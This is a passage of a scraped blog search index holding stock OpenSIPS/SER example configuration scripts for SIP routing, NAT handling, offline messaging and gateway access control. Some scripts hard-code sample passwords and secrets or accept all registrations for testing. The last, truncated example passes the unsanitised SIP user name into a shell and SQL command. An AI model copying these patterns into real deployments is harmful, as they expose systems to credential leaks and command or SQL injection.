\u0026#34;0\u0026#34;); exit; }; # if ok, update contacts and ... save(\u0026#34;location\u0026#34;); # ... if this REGISTER is not a replica from our # peer server, replicate to the peer server $var(backup_ip) = \u0026#34;backup.foo.bar\u0026#34; {ip.resolve}; if (!$si==$var(backup_ip)) { t_replicate(\u0026#34;sip:backup.foo.bar:5060\u0026#34;); }; exit; }; # do whatever else appropriate for your domain log(\u0026#34;non-REGISTER\\n\u0026#34;); }; } ","permalink":"https://wdd.js.org/opensips/ch8/replicate/","summary":"# # demo script showing how to set-up usrloc replication # # ----------- global configuration parameters ------------------------ log_level=3 # logging level (cmd line: -dddddddddd) log_stderror=yes # (cmd line: -E) # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;auth.so\u0026#34; loadmodule \u0026#34;auth_db.so\u0026#34; # ----------------- setting module-specific parameters --------------- # digest generation secret; use the same in backup server; # also, make sure that the backup server has sync\u0026#39;ed time modparam(\u0026#34;auth\u0026#34;, \u0026#34;secret\u0026#34;, \u0026#34;alsdkhglaksdhfkloiwr\u0026#34;) # ------------------------- request routing logic ------------------- # main routing logic route{ # initial sanity checks -- messages with # max_forwards==0, or excessively long requests if (!","title":"replicate"},{"content":"# # $Id$ # # this example shows use of ser as stateless redirect server # # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; # 
------------------------- request routing logic ------------------- # main routing logic route{ # for testing purposes, simply okay all REGISTERs if ($rm==\u0026#34;REGISTER\u0026#34;) { log(\u0026#34;REGISTER\u0026#34;); sl_send_reply(\u0026#34;200\u0026#34;, \u0026#34;ok\u0026#34;); return; }; # rewrite current URI, which is always part of destination ser rewriteuri(\u0026#34;sip:parallel@siphub.net:9\u0026#34;); # append one more URI to the destination ser append_branch(\u0026#34;sip:redirect@siphub.net:9\u0026#34;); # redirect now sl_send_reply(\u0026#34;300\u0026#34;, \u0026#34;Redirect\u0026#34;); } ","permalink":"https://wdd.js.org/opensips/ch8/redirect/","summary":"# # $Id$ # # this example shows use of ser as stateless redirect server # # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; # ------------------------- request routing logic ------------------- # main routing logic route{ # for testing purposes, simply okay all REGISTERs if ($rm==\u0026#34;REGISTER\u0026#34;) { log(\u0026#34;REGISTER\u0026#34;); sl_send_reply(\u0026#34;200\u0026#34;, \u0026#34;ok\u0026#34;); return; }; # rewrite current URI, which is always part of destination ser rewriteuri(\u0026#34;sip:parallel@siphub.net:9\u0026#34;); # append one more URI to the destination ser append_branch(\u0026#34;sip:redirect@siphub.","title":"redirect"},{"content":"# # $Id$ # # example: ser configured as PSTN gateway guard; PSTN gateway is located # at 192.168.0.10 # # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;acc.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule 
\u0026#34;auth.so\u0026#34; loadmodule \u0026#34;auth_db.so\u0026#34; loadmodule \u0026#34;group.so\u0026#34; loadmodule \u0026#34;uri.so\u0026#34; # ----------------- setting module-specific parameters --------------- modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;db_url\u0026#34;,\u0026#34;mysql://opensips:opensipsrw@localhost/opensips\u0026#34;) modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;calculate_ha1\u0026#34;, yes) modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;password_column\u0026#34;, \u0026#34;password\u0026#34;) # -- acc params -- modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_level\u0026#34;, 1) # that is the flag for which we will account -- don\u0026#39;t forget to # set the same one :-) modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_flag\u0026#34;, 1 ) # ------------------------- request routing logic ------------------- # main routing logic route{ /* ********* ROUTINE CHECKS ********************************** */ # filter too old messages if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { log(\u0026#34;LOG: Too many hops\\n\u0026#34;); sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; }; if ($ml \u0026gt;= 2048 ) { sl_send_reply(\u0026#34;513\u0026#34;, \u0026#34;Message too big\u0026#34;); exit; }; /* ********* RR ********************************** */ /* grant Route routing if route headers present */ if (loose_route()) { t_relay(); exit; }; /* record-route INVITEs -- all subsequent requests must visit us */ if ($rm==\u0026#34;INVITE\u0026#34;) { record_route(); }; # now check if it really is a PSTN destination which should be handled # by our gateway; if not, and the request is an invitation, drop it -- # we cannot terminate it in PSTN; relay non-INVITE requests -- it may # be for example BYEs sent by gateway to call originator if (!$ru=~\u0026#34;sip:\\+?[0-9]+@.*\u0026#34;) { if ($rm==\u0026#34;INVITE\u0026#34;) { sl_send_reply(\u0026#34;403\u0026#34;, \u0026#34;Call cannot be served here\u0026#34;); } 
else { forward(); }; exit; }; # account completed transactions via syslog setflag(1); # free call destinations ... no authentication needed if ( is_user_in(\u0026#34;Request-URI\u0026#34;, \u0026#34;free-pstn\u0026#34;) /* free destinations */ || $ru=~\u0026#34;sip:[79][0-9][0-9][0-9]@.*\u0026#34; /* local PBX */ || $ru=~\u0026#34;sip:98[0-9][0-9][0-9][0-9]\u0026#34;) { log(\u0026#34;free call\u0026#34;); } else if ($si==192.168.0.10) { # our gateway doesn\u0026#39;t support digest authentication; # verify that a request is coming from it by source # address log(\u0026#34;gateway-originated request\u0026#34;); } else { # in all other cases, we need to check the request against # access control lists; first of all, verify request # originator\u0026#39;s identity if (!proxy_authorize(\t\u0026#34;gateway\u0026#34; /* realm */, \u0026#34;subscriber\u0026#34; /* table name */)) { proxy_challenge( \u0026#34;gateway\u0026#34; /* realm */, \u0026#34;0\u0026#34; /* no qop */ ); exit; }; # authorize only for INVITEs -- RR/Contact may result in weird # things showing up in d-uri that would break our logic; our # major concern is INVITE which causes PSTN costs if ($rm==\u0026#34;INVITE\u0026#34;) { # does the authenticated user have a permission for local # calls (destinations beginning with a single zero)? # (i.e., is he in the \u0026#34;local\u0026#34; group?) 
if ($ru=~\u0026#34;sip:0[1-9][0-9]+@.*\u0026#34;) { if (!is_user_in(\u0026#34;credentials\u0026#34;, \u0026#34;local\u0026#34;)) { sl_send_reply(\u0026#34;403\u0026#34;, \u0026#34;No permission for local calls\u0026#34;); exit; }; # the same for long-distance (destinations begin with two zeros\u0026#34;) } else if ($ru=~\u0026#34;sip:00[1-9][0-9]+@.*\u0026#34;) { if (!is_user_in(\u0026#34;credentials\u0026#34;, \u0026#34;ld\u0026#34;)) { sl_send_reply(\u0026#34;403\u0026#34;, \u0026#34; no permission for LD \u0026#34;); exit; }; # the same for international calls (three zeros) } else if ($ru=~\u0026#34;sip:000[1-9][0-9]+@.*\u0026#34;) { if (!is_user_in(\u0026#34;credentials\u0026#34;, \u0026#34;int\u0026#34;)) { sl_send_reply(\u0026#34;403\u0026#34;, \u0026#34;International permissions needed\u0026#34;); exit; }; # everything else (e.g., interplanetary calls) is denied } else { sl_send_reply(\u0026#34;403\u0026#34;, \u0026#34;Forbidden\u0026#34;); exit; }; }; # INVITE to authorized PSTN }; # authorized PSTN # if you have passed through all the checks, let your call go to GW! 
rewritehostport(\u0026#34;192.168.0.10:5060\u0026#34;); # forward the request now if (!t_relay()) { sl_reply_error(); exit; }; } ","permalink":"https://wdd.js.org/opensips/ch8/pstn/","summary":"# # $Id$ # # example: ser configured as PSTN gateway guard; PSTN gateway is located # at 192.168.0.10 # # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;acc.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;auth.so\u0026#34; loadmodule \u0026#34;auth_db.so\u0026#34; loadmodule \u0026#34;group.so\u0026#34; loadmodule \u0026#34;uri.so\u0026#34; # ----------------- setting module-specific parameters --------------- modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;db_url\u0026#34;,\u0026#34;mysql://opensips:opensipsrw@localhost/opensips\u0026#34;) modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;calculate_ha1\u0026#34;, yes) modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;password_column\u0026#34;, \u0026#34;password\u0026#34;) # -- acc params -- modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_level\u0026#34;, 1) # that is the flag for which we will account -- don\u0026#39;t forget to # set the same one :-) modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_flag\u0026#34;, 1 ) # ------------------------- request routing logic ------------------- # main routing logic route{ /* ********* ROUTINE CHECKS ********************************** */ # filter too old messages if (!","title":"pstn"},{"content":"# # simple quick-start config script including nathelper support # This default script includes nathelper support. To make it work # you will also have to install Maxim\u0026#39;s RTP proxy. The proxy is enforced # if one of the parties is behind a NAT. 
# # If you have an endpoint in the public internet which is known to # support symmetric RTP (Cisco PSTN gateway or voicemail, for example), # then you don\u0026#39;t have to force RTP proxy. If you don\u0026#39;t want to enforce # RTP proxy for some destinations then simply use t_relay() instead of # route(1) # # Sections marked with !! Nathelper contain modifications for nathelper # # NOTE !! This config is EXPERIMENTAL ! # # ----------- global configuration parameters ------------------------ log_level=3 # logging level (cmd line: -dddddddddd) log_stderror=no # (cmd line: -E) /* Uncomment these lines to enter debugging mode */ #debug_mode=yes check_via=no\t# (cmd. line: -v) dns=no # (cmd. line: -r) rev_dns=no # (cmd. line: -R) port=5060 children=4 # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; # Uncomment this if you want to use SQL database #loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;signaling.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;textops.so\u0026#34; loadmodule \u0026#34;mi_fifo.so\u0026#34; # Uncomment this if you want digest authentication # db_mysql.so must be loaded ! #loadmodule \u0026#34;auth.so\u0026#34; #loadmodule \u0026#34;auth_db.so\u0026#34; # !! 
Nathelper loadmodule \u0026#34;nathelper.so\u0026#34; loadmodule \u0026#34;rtpproxy.so\u0026#34; # ----------------- setting module-specific parameters --------------- # -- mi_fifo params -- modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) # -- usrloc params -- modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) # Uncomment this if you want to use SQL database # for persistent storage and comment the previous line #modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 2) # -- auth params -- # Uncomment if you are using auth module #modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;calculate_ha1\u0026#34;, yes) # # If you set \u0026#34;calculate_ha1\u0026#34; parameter to yes (which is true in this config), # uncomment also the following parameter) #modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;password_column\u0026#34;, \u0026#34;password\u0026#34;) # !! Nathelper modparam(\u0026#34;usrloc\u0026#34;,\u0026#34;nat_bflag\u0026#34;,6) modparam(\u0026#34;nathelper\u0026#34;,\u0026#34;sipping_bflag\u0026#34;,8) modparam(\u0026#34;nathelper\u0026#34;, \u0026#34;ping_nated_only\u0026#34;, 1) # Ping only clients behind NAT # ------------------------- request routing logic ------------------- # main routing logic route{ # initial sanity checks -- messages with # max_forwards==0, or excessively long requests if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; }; if ($ml \u0026gt;= 2048 ) { sl_send_reply(\u0026#34;513\u0026#34;, \u0026#34;Message too big\u0026#34;); exit; }; # !! 
Nathelper # Special handling for NATed clients; first, NAT test is # executed: it looks for via!=received and RFC1918 addresses # in Contact (may fail if line-folding is used); also, # the received test, if completed, should check all # vias for presence of received if (nat_uac_test(\u0026#34;3\u0026#34;)) { # Allow RR-ed requests, as these may indicate that # a NAT-enabled proxy takes care of it; unless it is # a REGISTER if (is_method(\u0026#34;REGISTER\u0026#34;) || !is_present_hf(\u0026#34;Record-Route\u0026#34;)) { log(\u0026#34;LOG:Someone trying to register from private IP, rewriting\\n\u0026#34;); # This will work only for user agents that support symmetric # communication. We tested quite many of them and majority is # smart enough to be symmetric. In some phones it takes a # configuration option. With Cisco 7960, it is called # NAT_Enable=Yes, with kphone it is called \u0026#34;symmetric media\u0026#34; and # \u0026#34;symmetric signalling\u0026#34;. # Rewrite contact with source IP of signalling fix_nated_contact(); if ( is_method(\u0026#34;INVITE\u0026#34;) ) { fix_nated_sdp(\u0026#34;1\u0026#34;); # Add direction=active to SDP }; force_rport(); # Add rport parameter to topmost Via setbflag(6); # Mark as NATed # if you want sip nat pinging # setbflag(8); }; }; # subsequent messages within a dialog should take the # path determined by record-routing if (loose_route()) { # mark routing logic in request append_hf(\u0026#34;P-hint: rr-enforced\\r\\n\u0026#34;); route(1); exit; }; # we record-route all messages -- to make sure that # subsequent messages will go through our proxy; that\u0026#39;s # particularly good if upstream and downstream entities # use different transport protocol if (!is_method(\u0026#34;REGISTER\u0026#34;)) record_route(); if (!is_myself(\u0026#34;$rd\u0026#34;)) { # mark routing logic in request append_hf(\u0026#34;P-hint: outbound\\r\\n\u0026#34;); route(1); exit; }; # if the request is for other domain use UsrLoc # (in case, 
it does not work, use the following command # with proper names and addresses in it) if (is_myself(\u0026#34;$rd\u0026#34;)) { if (is_method(\u0026#34;REGISTER\u0026#34;)) { # Uncomment this if you want to use digest authentication #if (!www_authorize(\u0026#34;siphub.org\u0026#34;, \u0026#34;subscriber\u0026#34;)) { #\twww_challenge(\u0026#34;siphub.org\u0026#34;, \u0026#34;0\u0026#34;); #\treturn; #}; save(\u0026#34;location\u0026#34;); exit; }; lookup(\u0026#34;aliases\u0026#34;); if (!is_myself(\u0026#34;$rd\u0026#34;)) { append_hf(\u0026#34;P-hint: outbound alias\\r\\n\u0026#34;); route(1); exit; }; # native SIP destinations are handled using our USRLOC DB if (!lookup(\u0026#34;location\u0026#34;)) { sl_send_reply(\u0026#34;404\u0026#34;, \u0026#34;Not Found\u0026#34;); exit; }; }; append_hf(\u0026#34;P-hint: usrloc applied\\r\\n\u0026#34;); route(1); } route[1] { # !! Nathelper if ($ru=~\u0026#34;[@:](192\\.168\\.|10\\.|172\\.(1[6-9]|2[0-9]|3[0-1])\\.)\u0026#34; \u0026amp;\u0026amp; !search(\u0026#34;^Route:\u0026#34;)){ sl_send_reply(\u0026#34;479\u0026#34;, \u0026#34;We don\u0026#39;t forward to private IP addresses\u0026#34;); exit; }; # if client or server know to be behind a NAT, enable relay if (isbflagset(6)) { rtpproxy_offer(); }; # NAT processing of replies; apply to all transactions (for example, # re-INVITEs from public to private UA are hard to identify as # NATed at the moment of request processing); look at replies t_on_reply(\u0026#34;1\u0026#34;); # send it out now; use stateful forwarding as it works reliably # even for UDP2TCP if (!t_relay()) { sl_reply_error(); }; } # !! Nathelper onreply_route[1] { # NATed transaction ? if (isbflagset(6) \u0026amp;\u0026amp; $rs =~ \u0026#34;(183)|2[0-9][0-9]\u0026#34;) { fix_nated_contact(); rtpproxy_answer(); # otherwise, is it a transaction behind a NAT and we did not # know at time of request processing ? 
(RFC1918 contacts) } else if (nat_uac_test(\u0026#34;1\u0026#34;)) { fix_nated_contact(); }; } ","permalink":"https://wdd.js.org/opensips/ch8/nathelper/","summary":"# # simple quick-start config script including nathelper support # This default script includes nathelper support. To make it work # you will also have to install Maxim\u0026#39;s RTP proxy. The proxy is enforced # if one of the parties is behind a NAT. # # If you have an endpoint in the public internet which is known to # support symmetric RTP (Cisco PSTN gateway or voicemail, for example), # then you don\u0026#39;t have to force RTP proxy.","title":"nathelper"},{"content":"# # MSILO usage example # # $ID: daniel $ # children=2 check_via=no # (cmd. line: -v) dns=off # (cmd. line: -r) rev_dns=off # (cmd. line: -R) # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;textops.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;msilo.so\u0026#34; # ----------------- setting module-specific parameters --------------- # -- registrar params -- modparam(\u0026#34;registrar\u0026#34;, \u0026#34;default_expires\u0026#34;, 120) # -- usrloc params -- modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) # -- msilo params -- modparam(\u0026#34;msilo\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://opensips:opensipsrw@localhost/opensips\u0026#34;) # -- tm params -- modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_timer\u0026#34;, 10 ) modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_inv_timer\u0026#34;, 15 ) modparam(\u0026#34;tm\u0026#34;, \u0026#34;wt_timer\u0026#34;, 10 ) route{ if ( !mf_process_maxfwd_header(\u0026#34;10\u0026#34;) ) { 
sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; }; if (is_myself(\u0026#34;$rd\u0026#34;)) { # for testing purposes, simply okay all REGISTERs # is_method(\u0026#34;XYZ\u0026#34;) is faster than ($rm==\u0026#34;XYZ\u0026#34;) # but requires textops module if (is_method(\u0026#34;REGISTER\u0026#34;)) { save(\u0026#34;location\u0026#34;); log(\u0026#34;REGISTER received -\u0026gt; dumping messages with MSILO\\n\u0026#34;); # MSILO - dumping user\u0026#39;s offline messages if (m_dump()) { log(\u0026#34;MSILO: offline messages dumped - if they were\\n\u0026#34;); } else { log(\u0026#34;MSILO: no offline messages dumped\\n\u0026#34;); }; exit; }; # backup r-uri for m_dump() in case of delivery failure $avp(11) = $ru; # domestic SIP destinations are handled using our USRLOC DB if(!lookup(\u0026#34;location\u0026#34;)) { if (! t_newtran()) { sl_reply_error(); exit; }; # we do not care about anything else but MESSAGEs if (!is_method(\u0026#34;MESSAGE\u0026#34;)) { if (!t_reply(\u0026#34;404\u0026#34;, \u0026#34;Not found\u0026#34;)) { sl_reply_error(); }; exit; }; log(\u0026#34;MESSAGE received -\u0026gt; storing using MSILO\\n\u0026#34;); # MSILO - storing as offline message if (m_store(\u0026#34;$ru\u0026#34;)) { log(\u0026#34;MSILO: offline message stored\\n\u0026#34;); if (!t_reply(\u0026#34;202\u0026#34;, \u0026#34;Accepted\u0026#34;)) { sl_reply_error(); }; }else{ log(\u0026#34;MSILO: offline message NOT stored\\n\u0026#34;); if (!t_reply(\u0026#34;503\u0026#34;, \u0026#34;Service Unavailable\u0026#34;)) { sl_reply_error(); }; }; exit; }; # if the downstream UA does not support MESSAGE requests # go to failure_route[1] t_on_failure(\u0026#34;1\u0026#34;); t_relay(); exit; }; # forward anything else t_relay(); } failure_route[1] { # forwarding failed -- check if the request was a MESSAGE if (!is_method(\u0026#34;MESSAGE\u0026#34;)) exit; log(1,\u0026#34;MSILO: the downstream UA does not support MESSAGE requests ...\\n\u0026#34;); # we 
have changed the R-URI with the contact address -- ignore it now if (m_store(\u0026#34;$avp(11)\u0026#34;)) { log(\u0026#34;MSILO: offline message stored\\n\u0026#34;); t_reply(\u0026#34;202\u0026#34;, \u0026#34;Accepted\u0026#34;); }else{ log(\u0026#34;MSILO: offline message NOT stored\\n\u0026#34;); t_reply(\u0026#34;503\u0026#34;, \u0026#34;Service Unavailable\u0026#34;); }; } ","permalink":"https://wdd.js.org/opensips/ch8/msilo/","summary":"# # MSILO usage example # # $ID: daniel $ # children=2 check_via=no # (cmd. line: -v) dns=off # (cmd. line: -r) rev_dns=off # (cmd. line: -R) # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;textops.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;msilo.so\u0026#34; # ----------------- setting module-specific parameters --------------- # -- registrar params -- modparam(\u0026#34;registrar\u0026#34;, \u0026#34;default_expires\u0026#34;, 120) # -- usrloc params -- modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) # -- msilo params -- modparam(\u0026#34;msilo\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://opensips:opensipsrw@localhost/opensips\u0026#34;) # -- tm params -- modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_timer\u0026#34;, 10 ) modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_inv_timer\u0026#34;, 15 ) modparam(\u0026#34;tm\u0026#34;, \u0026#34;wt_timer\u0026#34;, 10 ) route{ if ( !","title":"msilo"},{"content":"# # logging example # # ------------------ module loading ---------------------------------- port=5060 log_stderror=yes log_level=3 # ------------------------- request routing logic ------------------- # main routing logic route{ # for testing 
purposes, simply okay all REGISTERs if (is_method(\u0026#34;REGISTER\u0026#34;)) { log(1, \u0026#34;REGISTER received\\n\u0026#34;); } else { log(1, \u0026#34;non-REGISTER received\\n\u0026#34;); }; if ($ru=~\u0026#34;sip:.*[@:]siphub.net\u0026#34;) { xlog(\u0026#34;request for siphub.net received\\n\u0026#34;); } else { xlog(\u0026#34;request for other domain [$rd] received\\n\u0026#34;); }; } ","permalink":"https://wdd.js.org/opensips/ch8/logging/","summary":"# # logging example # # ------------------ module loading ---------------------------------- port=5060 log_stderror=yes log_level=3 # ------------------------- request routing logic ------------------- # main routing logic route{ # for testing purposes, simply okay all REGISTERs if (is_method(\u0026#34;REGISTER\u0026#34;)) { log(1, \u0026#34;REGISTER received\\n\u0026#34;); } else { log(1, \u0026#34;non-REGISTER received\\n\u0026#34;); }; if ($ru=~\u0026#34;sip:.*[@:]siphub.net\u0026#34;) { xlog(\u0026#34;request for siphub.net received\\n\u0026#34;); } else { xlog(\u0026#34;request for other domain [$rd] received\\n\u0026#34;); }; } ","title":"logging"},{"content":"# # $Id$ # # this example shows use of opensips\u0026#39;s provisioning interface # # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib64/opensips/modules/\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;httpd.so\u0026#34; modparam(\u0026#34;httpd\u0026#34;, \u0026#34;port\u0026#34;, 8888) loadmodule \u0026#34;mi_http.so\u0026#34; loadmodule \u0026#34;pi_http.so\u0026#34; modparam(\u0026#34;pi_http\u0026#34;, \u0026#34;framework\u0026#34;, \u0026#34;/usr/local/src/opensips/examples/pi_framework.xml\u0026#34;) loadmodule \u0026#34;mi_xmlrpc_ng.so\u0026#34; # ------------------------- request routing logic ------------------- # main routing logic route{ exit; } ","permalink":"https://wdd.js.org/opensips/ch8/httpd/","summary":"# # $Id$ # # this example shows 
use of opensips\u0026#39;s provisioning interface # # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib64/opensips/modules/\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;httpd.so\u0026#34; modparam(\u0026#34;httpd\u0026#34;, \u0026#34;port\u0026#34;, 8888) loadmodule \u0026#34;mi_http.so\u0026#34; loadmodule \u0026#34;pi_http.so\u0026#34; modparam(\u0026#34;pi_http\u0026#34;, \u0026#34;framework\u0026#34;, \u0026#34;/usr/local/src/opensips/examples/pi_framework.xml\u0026#34;) loadmodule \u0026#34;mi_xmlrpc_ng.so\u0026#34; # ------------------------- request routing logic ------------------- # main routing logic route{ exit; } ","title":"httpd"},{"content":"# # simple quick-start config script # # ----------- global configuration parameters ------------------------ log_level=3 # logging level (cmd line: -dddddddddd) log_stderror=no # (cmd line: -E) check_via=no\t# (cmd. line: -v) dns=no # (cmd. line: -r) rev_dns=no # (cmd. line: -R) children=4 port=5060 # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; # Uncomment this if you want to use SQL database #loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;textops.so\u0026#34; loadmodule \u0026#34;mi_fifo.so\u0026#34; # Uncomment this if you want digest authentication # mysql.so must be loaded ! 
#loadmodule \u0026#34;auth.so\u0026#34; #loadmodule \u0026#34;auth_db.so\u0026#34; # ----------------- setting module-specific parameters --------------- # -- mi_fifo params -- modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) # -- usrloc params -- modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) # Uncomment this if you want to use SQL database # for persistent storage and comment the previous line #modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 2) # -- auth params -- # Uncomment if you are using auth module # #modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;calculate_ha1\u0026#34;, yes) # # If you set \u0026#34;calculate_ha1\u0026#34; parameter to yes (which is true in this config), # uncomment also the following parameter) # #modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;password_column\u0026#34;, \u0026#34;password\u0026#34;) # ------------------------- request routing logic ------------------- # main routing logic route{ setflag(1); t_on_failure(\u0026#34;1\u0026#34;); t_on_reply(\u0026#34;1\u0026#34;); log(1, \u0026#34;message received\\n\u0026#34;); t_relay(\u0026#34;udp:opensips.org:5060\u0026#34;); } onreply_route[1] { if (isflagset(1)) { log(1, \u0026#34;onreply: flag set\\n\u0026#34;); } else { log(1, \u0026#34;onreply: flag unset\\n\u0026#34;); }; } failure_route[1] { if (isflagset(1)) { log(1, \u0026#34;failure: flag set\\n\u0026#34;); } else { log(1, \u0026#34;failure: flag unset\\n\u0026#34;); }; } ","permalink":"https://wdd.js.org/opensips/ch8/flag-reply/","summary":"# # simple quick-start config script # # ----------- global configuration parameters ------------------------ log_level=3 # logging level (cmd line: -dddddddddd) log_stderror=no # (cmd line: -E) check_via=no\t# (cmd. line: -v) dns=no # (cmd. line: -r) rev_dns=no # (cmd. 
line: -R) children=4 port=5060 # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; # Uncomment this if you want to use SQL database #loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; loadmodule \u0026#34;maxfwd.","title":"flag_reply"},{"content":"# # $Id$ # # simple quick-start config script # # ----------- global configuration parameters ------------------------ #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;exec.so\u0026#34; # ----------------- setting module-specific parameters --------------- route{ # uri for my domain ? if (is_myself(\u0026#34;$rd\u0026#34;)) { if ($rm==\u0026#34;REGISTER\u0026#34;) { save(\u0026#34;location\u0026#34;); return; }; # native SIP destinations are handled using our USRLOC DB if (!lookup(\u0026#34;location\u0026#34;)) { # proceed to email notification if ($rm==\u0026#34;INVITE\u0026#34;) route(1) else sl_send_reply(\u0026#34;404\u0026#34;, \u0026#34;Not Found\u0026#34;); exit; }; }; # user found, forward to his current uri now if (!t_relay()) { sl_reply_error(); }; } /* handling of missed calls */ route[1] { # don\u0026#39;t continue if it is a retransmission if ( !t_newtran()) { sl_reply_error(); exit; }; # external script: lookup user, if user exists, send # an email notification to him if (!exec_msg(\u0026#39; QUERY=\u0026#34;select email_address from subscriber where user=\\\u0026#34;$$SIP_OUSER\\\u0026#34;\u0026#34;; EMAIL=`mysql -Bsuser -pheslo -e \u0026#34;$$QUERY\u0026#34; ser`; if [ -z \u0026#34;$$EMAIL\u0026#34; ] ; then exit 1; fi ; echo \u0026#34;SIP request received from $$SIP_HF_FROM for $$SIP_OUSER\u0026#34; | mail 
